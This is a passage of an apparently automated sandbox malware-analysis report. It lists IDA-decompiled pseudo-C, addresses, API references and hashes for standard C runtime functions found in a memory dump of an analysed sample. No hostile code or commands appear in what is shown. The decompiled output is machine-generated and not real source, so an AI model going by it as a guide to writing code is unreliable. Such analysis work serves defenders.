                                                          								_t100 =  *(_t119 + 0x18);
                                                          							}
                                                          							_v16 = _t100;
                                                          							__eflags = _t117;
                                                          							if(_t117 == 0) {
                                                          								L41:
                                                          								return _a16;
                                                          							} else {
                                                          								do {
                                                          									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                          									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                          										L24:
                                                          										__eflags = _t98 - _t100;
                                                          										if(_t98 < _t100) {
                                                          											_t81 = E00401829(_t98, _t119, _t119);
                                                          											__eflags = _t81 - 0xffffffff;
                                                          											if(_t81 == 0xffffffff) {
                                                          												L46:
                                                          												return (_t117 - _t98) / _a12;
                                                          											}
                                                          											_t102 = _v12;
                                                          											__eflags = _t102;
                                                          											if(_t102 == 0) {
                                                          												L42:
                                                          												__eflags = _a8 - 0xffffffff;
                                                          												if(_a8 != 0xffffffff) {
                                                          													E00401B60(_a4, 0, _a8);
                                                          												}
                                                          												 *((intOrPtr*)(E004024C9())) = 0x22;
                                                          												L4:
                                                          												E004017EE();
                                                          												goto L5;
                                                          											}
                                                          											_t110 = _v8;
                                                          											 *_t110 = _t81;
                                                          											_t98 = _t98 - 1;
                                                          											_v8 = _t110 + 1;
                                                          											_t103 = _t102 - 1;
                                                          											__eflags = _t103;
                                                          											_v12 = _t103;
                                                          											_t100 =  *(_t119 + 0x18);
                                                          											_v16 = _t100;
                                                          											goto L40;
                                                          										}
                                                          										__eflags = _t100;
                                                          										if(_t100 == 0) {
                                                          											_t86 = 0x7fffffff;
                                                          											__eflags = _t98 - 0x7fffffff;
                                                          											if(_t98 <= 0x7fffffff) {
                                                          												_t86 = _t98;
                                                          											}
                                                          										} else {
                                                          											__eflags = _t98 - 0x7fffffff;
                                                          											if(_t98 <= 0x7fffffff) {
                                                          												_t44 = _t98 % _t100;
                                                          												__eflags = _t44;
                                                          												_t113 = _t44;
                                                          												_t91 = _t98;
                                                          											} else {
                                                          												_t113 = 0x7fffffff % _t100;
                                                          												_t91 = 0x7fffffff;
                                                          											}
                                                          											_t86 = _t91 - _t113;
                                                          										}
                                                          										__eflags = _t86 - _v12;
                                                          										if(_t86 > _v12) {
                                                          											goto L42;
                                                          										} else {
                                                          											_push(_t86);
                                                          											_push(_v8);
                                                          											_push(E0040194A(_t119));
                                                          											_t88 = E00401D04();
                                                          											_t120 = _t120 + 0xc;
                                                          											__eflags = _t88;
                                                          											if(_t88 == 0) {
                                                          												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                                                          												goto L46;
                                                          											}
                                                          											__eflags = _t88 - 0xffffffff;
                                                          											if(_t88 == 0xffffffff) {
                                                          												L45:
                                                          												_t64 = _t119 + 0xc;
                                                          												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                                                          												__eflags =  *_t64;
                                                          												goto L46;
                                                          											}
                                                          											_t98 = _t98 - _t88;
                                                          											__eflags = _t98;
                                                          											L36:
                                                          											_v8 = _v8 + _t88;
                                                          											_v12 = _v12 - _t88;
                                                          											_t100 = _v16;
                                                          											goto L40;
                                                          										}
                                                          									}
                                                          									_t94 =  *(_t119 + 4);
                                                          									_v20 = _t94;
                                                          									__eflags = _t94;
                                                          									if(__eflags == 0) {
                                                          										goto L24;
                                                          									}
                                                          									if(__eflags < 0) {
                                                          										goto L45;
                                                          									}
                                                          									__eflags = _t98 - _t94;
                                                          									if(_t98 < _t94) {
                                                          										_t94 = _t98;
                                                          										_v20 = _t98;
                                                          									}
                                                          									_t104 = _v12;
                                                          									__eflags = _t94 - _t104;
                                                          									if(_t94 > _t104) {
                                                          										goto L42;
                                                          									} else {
                                                          										E00401ADE(_v8, _t104,  *_t119, _t94);
                                                          										_t88 = _v20;
                                                          										_t120 = _t120 + 0x10;
                                                          										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                                                          										_t98 = _t98 - _t88;
                                                          										 *_t119 =  *_t119 + _t88;
                                                          										goto L36;
                                                          									}
                                                          									L40:
                                                          									__eflags = _t98;
                                                          								} while (_t98 != 0);
                                                          								goto L41;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t74 = (_t74 | 0xffffffff) / _a12;
                                                          					__eflags = _t97 - _t74;
                                                          					if(_t97 <= _t74) {
                                                          						goto L13;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				L3:
                                                          				 *((intOrPtr*)(E004024C9())) = 0x16;
                                                          				goto L4;
                                                          			}




























                                                          0x004011c6
                                                          0x004011c9
                                                          0x004011cf
                                                          0x004011d2
                                                          0x004011d5
                                                          0x004011f2
                                                          0x00000000
                                                          0x004011f2
                                                          0x004011d7
                                                          0x004011dc
                                                          0x00000000
                                                          0x00000000
                                                          0x004011e0
                                                          0x004011fb
                                                          0x004011fe
                                                          0x00401200
                                                          0x0040120e
                                                          0x0040120e
                                                          0x00401212
                                                          0x0040121a
                                                          0x0040121f
                                                          0x0040121f
                                                          0x00401222
                                                          0x00401224
                                                          0x00000000
                                                          0x00401226
                                                          0x00401226
                                                          0x0040122e
                                                          0x00401230
                                                          0x00000000
                                                          0x00000000
                                                          0x00401232
                                                          0x00401235
                                                          0x00401238
                                                          0x0040123f
                                                          0x00401241
                                                          0x00401248
                                                          0x00401243
                                                          0x00401243
                                                          0x00401243
                                                          0x0040124d
                                                          0x00401250
                                                          0x00401252
                                                          0x0040133b
                                                          0x00000000
                                                          0x00401258
                                                          0x00401258
                                                          0x00401258
                                                          0x0040125f
                                                          0x004012a0
                                                          0x004012a0
                                                          0x004012a2
                                                          0x0040130d
                                                          0x00401313
                                                          0x00401316
                                                          0x0040136d
                                                          0x00000000
                                                          0x00401373
                                                          0x00401318
                                                          0x0040131b
                                                          0x0040131d
                                                          0x00401343
                                                          0x00401343
                                                          0x00401347
                                                          0x00401351
                                                          0x00401356
                                                          0x0040135e
                                                          0x004011ed
                                                          0x004011ed
                                                          0x00000000
                                                          0x004011ed
                                                          0x0040131f
                                                          0x00401322
                                                          0x00401325
                                                          0x00401326
                                                          0x00401329
                                                          0x00401329
                                                          0x0040132a
                                                          0x0040132d
                                                          0x00401330
                                                          0x00000000
                                                          0x00401330
                                                          0x004012a4
                                                          0x004012a6
                                                          0x004012ca
                                                          0x004012cf
                                                          0x004012d5
                                                          0x004012d7
                                                          0x004012d7
                                                          0x004012a8
                                                          0x004012aa
                                                          0x004012b0
                                                          0x004012c2
                                                          0x004012c2
                                                          0x004012c2
                                                          0x004012c4
                                                          0x004012b2
                                                          0x004012b7
                                                          0x004012b9
                                                          0x004012b9
                                                          0x004012c6
                                                          0x004012c6
                                                          0x004012d9
                                                          0x004012dc
                                                          0x00000000
                                                          0x004012de
                                                          0x004012de
                                                          0x004012df
                                                          0x004012e9
                                                          0x004012ea
                                                          0x004012ef
                                                          0x004012f2
                                                          0x004012f4
                                                          0x0040137b
                                                          0x00000000
                                                          0x0040137b
                                                          0x004012fa
                                                          0x004012fd
                                                          0x00401369
                                                          0x00401369
                                                          0x00401369
                                                          0x00401369
                                                          0x00000000
                                                          0x00401369
                                                          0x004012ff
                                                          0x004012ff
                                                          0x00401301
                                                          0x00401301
                                                          0x00401304
                                                          0x00401307
                                                          0x00000000
                                                          0x00401307
                                                          0x004012dc
                                                          0x00401261
                                                          0x00401264
                                                          0x00401267
                                                          0x00401269
                                                          0x00000000
                                                          0x00000000
                                                          0x0040126b
                                                          0x00000000
                                                          0x00000000
                                                          0x00401271
                                                          0x00401273
                                                          0x00401275
                                                          0x00401277
                                                          0x00401277
                                                          0x0040127a
                                                          0x0040127d
                                                          0x0040127f
                                                          0x00000000
                                                          0x00401285
                                                          0x0040128c
                                                          0x00401291
                                                          0x00401294
                                                          0x00401297
                                                          0x0040129a
                                                          0x0040129c
                                                          0x00000000
                                                          0x0040129c
                                                          0x00401333
                                                          0x00401333
                                                          0x00401333
                                                          0x00000000
                                                          0x00401258
                                                          0x00401252
                                                          0x00401224
                                                          0x00401207
                                                          0x0040120a
                                                          0x0040120c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040120c
                                                          0x004011e2
                                                          0x004011e7
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: 5112d85f97c71c139c9da0b529e63dbc9639d42f3f555ff927f58fbeb55d1acd
                                                          • Instruction ID: cf3cdffc9f5a22b3a5bc0b0a3e7c0e9796cf8811e6014f552bdcdaa456813bfd
                                                          • Opcode Fuzzy Hash: 5112d85f97c71c139c9da0b529e63dbc9639d42f3f555ff927f58fbeb55d1acd
                                                          • Instruction Fuzzy Hash: 2451D430A00205DBDB248EAAC88466F77A5AF44320F24877FF825F66E0D7789E519B49
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 411 408075-40807c 412 408089-40808f 411->412 413 40807e-408088 call 407fe3 411->413 414 408091-40809c call 404535 412->414 415 40809e-40809f 412->415 423 4080eb-4080ed 414->423 418 4080d1-4080d4 415->418 421 4080a1-4080a3 418->421 422 4080d6-4080e2 call 406d05 call 4024c9 418->422 424 4080a5 421->424 425 4080a6-4080bc HeapReAlloc 421->425 437 4080e8 422->437 424->425 427 40811c-40811e 425->427 428 4080be-4080c4 425->428 432 4080ea 427->432 430 408106-40811a call 4024c9 GetLastError call 4024dc 428->430 431 4080c6-4080cf call 406d05 428->431 430->427 431->418 440 4080ee-408104 call 4024c9 GetLastError call 4024dc 431->440 432->423 437->432 440->437
                                                          C-Code - Quality: 95%
                                                          			E00408075(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                          				void* _t7;
                                                          				void* _t8;
                                                          				intOrPtr* _t9;
                                                          				intOrPtr* _t12;
                                                          				void* _t20;
                                                          				long _t31;
                                                          
                                                          				if(_a4 != 0) {
                                                          					_t31 = _a8;
                                                          					if(_t31 != 0) {
                                                          						_push(__ebx);
                                                          						while(_t31 <= 0xffffffe0) {
                                                          							if(_t31 == 0) {
                                                          								_t31 = _t31 + 1;
                                                          							}
                                                          							_t7 = HeapReAlloc( *0x414224, 0, _a4, _t31);
                                                          							_t20 = _t7;
                                                          							if(_t20 != 0) {
                                                          								L17:
                                                          								_t8 = _t20;
                                                          							} else {
                                                          								if( *0x415060 == _t7) {
                                                          									_t9 = E004024C9();
                                                          									 *_t9 = E004024DC(GetLastError());
                                                          									goto L17;
                                                          								} else {
                                                          									if(E00406D05(_t7, _t31) == 0) {
                                                          										_t12 = E004024C9();
                                                          										 *_t12 = E004024DC(GetLastError());
                                                          										L12:
                                                          										_t8 = 0;
                                                          									} else {
                                                          										continue;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L14;
                                                          						}
                                                          						E00406D05(_t6, _t31);
                                                          						 *((intOrPtr*)(E004024C9())) = 0xc;
                                                          						goto L12;
                                                          					} else {
                                                          						E00404535(_a4);
                                                          						_t8 = 0;
                                                          					}
                                                          					L14:
                                                          					return _t8;
                                                          				} else {
                                                          					return E00407FE3(__ebx, __edx, __edi, _a8);
                                                          				}
                                                          			}









                                                          0x0040807c
                                                          0x0040808a
                                                          0x0040808f
                                                          0x0040809e
                                                          0x004080d1
                                                          0x004080a3
                                                          0x004080a5
                                                          0x004080a5
                                                          0x004080b2
                                                          0x004080b8
                                                          0x004080bc
                                                          0x0040811c
                                                          0x0040811c
                                                          0x004080be
                                                          0x004080c4
                                                          0x00408106
                                                          0x0040811a
                                                          0x00000000
                                                          0x004080c6
                                                          0x004080cf
                                                          0x004080ee
                                                          0x00408102
                                                          0x004080e8
                                                          0x004080e8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004080cf
                                                          0x004080c4
                                                          0x00000000
                                                          0x004080ea
                                                          0x004080d7
                                                          0x004080e2
                                                          0x00000000
                                                          0x00408091
                                                          0x00408094
                                                          0x0040809a
                                                          0x0040809a
                                                          0x004080eb
                                                          0x004080ed
                                                          0x0040807e
                                                          0x00408088
                                                          0x00408088

                                                          APIs
                                                          • _malloc.LIBCMT ref: 00408081
                                                            • Part of subcall function 00407FE3: __FF_MSGBANNER.LIBCMT ref: 00407FFA
                                                            • Part of subcall function 00407FE3: __NMSG_WRITE.LIBCMT ref: 00408001
                                                            • Part of subcall function 00407FE3: RtlAllocateHeap.NTDLL(007B0000,00000000,00000001,00000000,00000000,00000000,?,004045CB,00000000,00000000,00000000,00000000,?,00404480,00000018,00411FD8), ref: 00408026
                                                          • _free.LIBCMT ref: 00408094
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free_malloc
                                                          • String ID:
                                                          • API String ID: 1020059152-0
                                                          • Opcode ID: 203b7c5fc3a61a23da61efa24fa73c8b6d154fd32cc8f013885648f5e2350aaa
                                                          • Instruction ID: 9f8fe8c4bbd9e52b1c20aa057dcece5d638b265e9f3ef175acddb1746402e183
                                                          • Opcode Fuzzy Hash: 203b7c5fc3a61a23da61efa24fa73c8b6d154fd32cc8f013885648f5e2350aaa
                                                          • Instruction Fuzzy Hash: 2E110A32504215ABCB202F76FE0966B37A46F44364F11893FF989BA2D0DF7C8885C69C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 16%
                                                          			E004030DE(void* __ecx, intOrPtr _a4) {
                                                          				struct HINSTANCE__* _v8;
                                                          				_Unknown_base(*)()* _t4;
                                                          
                                                          				_t4 =  &_v8;
                                                          				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
                                                          				if(_t4 != 0) {
                                                          					_t4 = GetProcAddress(_v8, "CorExitProcess");
                                                          					if(_t4 != 0) {
                                                          						return  *_t4(_a4);
                                                          					}
                                                          				}
                                                          				return _t4;
                                                          			}





                                                          0x004030e2
                                                          0x004030ed
                                                          0x004030f5
                                                          0x004030ff
                                                          0x00403107
                                                          0x00000000
                                                          0x0040310c
                                                          0x00403107
                                                          0x00403111

                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,0040311D,00000000,?,00408010,000000FF,0000001E,00000000,00000000,00000000,?,004045CB), ref: 004030ED
                                                          • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 004030FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 1646373207-1276376045
                                                          • Opcode ID: e41157a03b6b2c61028faa385d86cc0ba5d050f528bde22708dc0c239dc5d6e7
                                                          • Instruction ID: 7a72415fad87126f0e2fa5a039a0ddc386d1adc0ae7252d34b4d1e54dfdeeb3d
                                                          • Opcode Fuzzy Hash: e41157a03b6b2c61028faa385d86cc0ba5d050f528bde22708dc0c239dc5d6e7
                                                          • Instruction Fuzzy Hash: 48D0123034020CBBEB109F93DE05F5A7EADDB08742F10097ABD08F51D1DA75EA309669
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040A93D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                          				intOrPtr _t25;
                                                          				void* _t26;
                                                          
                                                          				_t25 = _a16;
                                                          				if(_t25 == 0x65 || _t25 == 0x45) {
                                                          					_t26 = E0040AE8E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          					goto L9;
                                                          				} else {
                                                          					_t34 = _t25 - 0x66;
                                                          					if(_t25 != 0x66) {
                                                          						__eflags = _t25 - 0x61;
                                                          						if(_t25 == 0x61) {
                                                          							L7:
                                                          							_t26 = E0040A9C3(_a4, _a8, _a12, _a20, _a24, _a28);
                                                          						} else {
                                                          							__eflags = _t25 - 0x41;
                                                          							if(__eflags == 0) {
                                                          								goto L7;
                                                          							} else {
                                                          								_t26 = E0040B109(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          							}
                                                          						}
                                                          						L9:
                                                          						return _t26;
                                                          					} else {
                                                          						return E0040B048(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                                                          					}
                                                          				}
                                                          			}





                                                          0x0040a940
                                                          0x0040a946
                                                          0x0040a9b9
                                                          0x00000000
                                                          0x0040a94d
                                                          0x0040a94d
                                                          0x0040a950
                                                          0x0040a96b
                                                          0x0040a96e
                                                          0x0040a98e
                                                          0x0040a9a0
                                                          0x0040a970
                                                          0x0040a970
                                                          0x0040a973
                                                          0x00000000
                                                          0x0040a975
                                                          0x0040a987
                                                          0x0040a987
                                                          0x0040a973
                                                          0x0040a9be
                                                          0x0040a9c2
                                                          0x0040a952
                                                          0x0040a96a
                                                          0x0040a96a
                                                          0x0040a950

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction ID: b85d4b3049c9008af4f0c0b863223919110253e8b4ae8400fcd67ebda280d961
                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction Fuzzy Hash: 370142B214024DBBCF125E85CC11CEE3F26BF18354B598826FE1868171D33AC971AB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E0040412D(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                          				intOrPtr _v0;
                                                          				void* _v808;
                                                          				int _t9;
                                                          				intOrPtr _t14;
                                                          				signed int _t15;
                                                          				signed int _t17;
                                                          				signed int _t19;
                                                          				intOrPtr _t22;
                                                          				intOrPtr _t23;
                                                          				intOrPtr _t24;
                                                          				intOrPtr _t25;
                                                          				intOrPtr _t26;
                                                          				intOrPtr _t27;
                                                          				intOrPtr _t28;
                                                          				intOrPtr* _t30;
                                                          				intOrPtr* _t32;
                                                          				void* _t35;
                                                          
                                                          				_t28 = __esi;
                                                          				_t27 = __edi;
                                                          				_t26 = __edx;
                                                          				_t23 = __ecx;
                                                          				_t22 = __ebx;
                                                          				_t35 = _t23 -  *0x413500; // 0x9c05bbfe
                                                          				if(_t35 == 0) {
                                                          					asm("repe ret");
                                                          				}
                                                          				_t30 = _t32;
                                                          				_t9 = IsProcessorFeaturePresent(0x17);
                                                          				if(_t9 != 0) {
                                                          					_t23 = 2;
                                                          					asm("int 0x29");
                                                          				}
                                                          				 *0x414e30 = _t9;
                                                          				 *0x414e2c = _t23;
                                                          				 *0x414e28 = _t26;
                                                          				 *0x414e24 = _t22;
                                                          				 *0x414e20 = _t28;
                                                          				 *0x414e1c = _t27;
                                                          				 *0x414e48 = ss;
                                                          				 *0x414e3c = cs;
                                                          				 *0x414e18 = ds;
                                                          				 *0x414e14 = es;
                                                          				 *0x414e10 = fs;
                                                          				 *0x414e0c = gs;
                                                          				asm("pushfd");
                                                          				_pop( *0x414e40);
                                                          				 *0x414e34 =  *_t30;
                                                          				 *0x414e38 = _v0;
                                                          				 *0x414e44 =  &_a4;
                                                          				 *0x414d80 = 0x10001;
                                                          				_t14 =  *0x414e38; // 0x0
                                                          				 *0x414d3c = _t14;
                                                          				 *0x414d30 = 0xc0000409;
                                                          				 *0x414d34 = 1;
                                                          				 *0x414d40 = 1;
                                                          				_t15 = 4;
                                                          				 *((intOrPtr*)(0x414d44 + _t15 * 0)) = 2;
                                                          				_t17 = 4;
                                                          				_t24 =  *0x413500; // 0x9c05bbfe
                                                          				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
                                                          				_t19 = 4;
                                                          				_t25 =  *0x413504; // 0x63fa4401
                                                          				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
                                                          				return E0040738B(_t19 << 0, "0MA");
                                                          			}




















                                                          0x0040412d
                                                          0x0040412d
                                                          0x0040412d
                                                          0x0040412d
                                                          0x0040412d
                                                          0x0040412d
                                                          0x00404133
                                                          0x00404135
                                                          0x00404135
                                                          0x004073c9
                                                          0x004073d3
                                                          0x004073da
                                                          0x004073de
                                                          0x004073df
                                                          0x004073df
                                                          0x004073e1
                                                          0x004073e6
                                                          0x004073ec
                                                          0x004073f2
                                                          0x004073f8
                                                          0x004073fe
                                                          0x00407404
                                                          0x0040740b
                                                          0x00407412
                                                          0x00407419
                                                          0x00407420
                                                          0x00407427
                                                          0x0040742e
                                                          0x0040742f
                                                          0x00407438
                                                          0x00407440
                                                          0x00407448
                                                          0x00407453
                                                          0x0040745d
                                                          0x00407462
                                                          0x00407467
                                                          0x00407471
                                                          0x0040747b
                                                          0x00407487
                                                          0x0040748b
                                                          0x00407497
                                                          0x0040749b
                                                          0x004074a1
                                                          0x004074a7
                                                          0x004074ab
                                                          0x004074b1
                                                          0x004074c2

                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004073D3
                                                          • ___raise_securityfailure.LIBCMT ref: 004074BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                          • String ID: 0MA
                                                          • API String ID: 3761405300-2670099660
                                                          • Opcode ID: 10687dbb931aabde788e87b565521ef1de1769e34277da068579617722567ceb
                                                          • Instruction ID: 4d7014942219b6f5ceedf13c626a08c3852bc8b33df36f437cf18d2bd91ecdc5
                                                          • Opcode Fuzzy Hash: 10687dbb931aabde788e87b565521ef1de1769e34277da068579617722567ceb
                                                          • Instruction Fuzzy Hash: A521F0B5550304DBEB11DF55FE81A907BA4BB88710F14D03AE9089B7A0E3B95A91CB4D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040196E() {
                                                          				intOrPtr _t3;
                                                          				intOrPtr _t4;
                                                          				void* _t6;
                                                          				intOrPtr _t9;
                                                          				void* _t12;
                                                          				intOrPtr _t13;
                                                          
                                                          				_t3 =  *0x416124;
                                                          				_t13 = 0x14;
                                                          				if(_t3 != 0) {
                                                          					if(_t3 < _t13) {
                                                          						_t3 = _t13;
                                                          						goto L4;
                                                          					}
                                                          				} else {
                                                          					_t3 = 0x200;
                                                          					L4:
                                                          					 *0x416124 = _t3;
                                                          				}
                                                          				_t4 = E0040456D(_t3, 4);
                                                          				 *0x416120 = _t4;
                                                          				if(_t4 != 0) {
                                                          					L8:
                                                          					_t12 = 0;
                                                          					_t9 = 0x413008;
                                                          					while(1) {
                                                          						 *((intOrPtr*)(_t12 + _t4)) = _t9;
                                                          						_t9 = _t9 + 0x20;
                                                          						_t12 = _t12 + 4;
                                                          						if(_t9 >= 0x413288) {
                                                          							break;
                                                          						}
                                                          						_t4 =  *0x416120;
                                                          					}
                                                          					return 0;
                                                          				} else {
                                                          					 *0x416124 = _t13;
                                                          					_t4 = E0040456D(_t13, 4);
                                                          					 *0x416120 = _t4;
                                                          					if(_t4 != 0) {
                                                          						goto L8;
                                                          					} else {
                                                          						_t6 = 0x1a;
                                                          						return _t6;
                                                          					}
                                                          				}
                                                          			}









                                                          0x0040196e
                                                          0x00401976
                                                          0x00401979
                                                          0x00401984
                                                          0x00401986
                                                          0x00000000
                                                          0x00401986
                                                          0x0040197b
                                                          0x0040197b
                                                          0x00401988
                                                          0x00401988
                                                          0x00401988
                                                          0x00401990
                                                          0x00401995
                                                          0x0040199e
                                                          0x004019be
                                                          0x004019be
                                                          0x004019c0
                                                          0x004019c5
                                                          0x004019c5
                                                          0x004019c8
                                                          0x004019cb
                                                          0x004019d4
                                                          0x00000000
                                                          0x00000000
                                                          0x004019d6
                                                          0x004019d6
                                                          0x004019e0
                                                          0x004019a0
                                                          0x004019a3
                                                          0x004019a9
                                                          0x004019ae
                                                          0x004019b7
                                                          0x00000000
                                                          0x004019b9
                                                          0x004019bb
                                                          0x004019bd
                                                          0x004019bd
                                                          0x004019b7

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: __calloc_crt
                                                          • String ID: QA
                                                          • API String ID: 3494438863-1702331105
                                                          • Opcode ID: e61353a67c3b75d03766be3be1206ce3dbc83965c3f1a3ac28e3a870fa1f8643
                                                          • Instruction ID: 3e9ddad1e3de1c0e95620cbe28ab7805e9b9329235e72186096bcbda3288e2ad
                                                          • Opcode Fuzzy Hash: e61353a67c3b75d03766be3be1206ce3dbc83965c3f1a3ac28e3a870fa1f8643
                                                          • Instruction Fuzzy Hash: 27F0C8F1345201AAF714CB65BD516D56FE5E748724F21413FE640EA2E5E338C841C74C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DecodePointer.KERNEL32(?,004017FA,00000000,00000000,00000000,00000000,00000000,00403C29,?,004039CE,00000003,00407FFF,00000000,00000000,00000000), ref: 004017CC
                                                          • __invoke_watson.LIBCMT ref: 004017E8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: DecodePointer__invoke_watson
                                                          • String ID: 0Kw
                                                          • API String ID: 4034010525-1246214110
                                                          • Opcode ID: d2e17d451a76cd75420c9187795bf27789629b420142b2d469eafdd2ab0cb3f0
                                                          • Instruction ID: c97e1cab28a9a0a5774540a9f45a6d0117cf2650b7669a4f547a1e58f4d2c784
                                                          • Opcode Fuzzy Hash: d2e17d451a76cd75420c9187795bf27789629b420142b2d469eafdd2ab0cb3f0
                                                          • Instruction Fuzzy Hash: 99E0EC35110109BBDF022F62DD098AA3A69BB14754B404435FE0092571DA37C971ABA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%